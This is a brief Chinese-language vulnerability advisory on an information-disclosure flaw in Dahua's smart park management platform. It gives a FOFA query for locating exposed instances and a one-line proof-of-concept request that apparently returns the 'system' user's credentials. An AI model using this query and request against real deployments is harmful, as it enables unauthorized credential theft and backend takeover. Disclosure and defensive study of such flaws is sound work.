Nx01 产品简介

        大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。

Nx02 漏洞描述

        大华智慧园区综合管理平台存在信息泄露漏洞，攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC：

/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。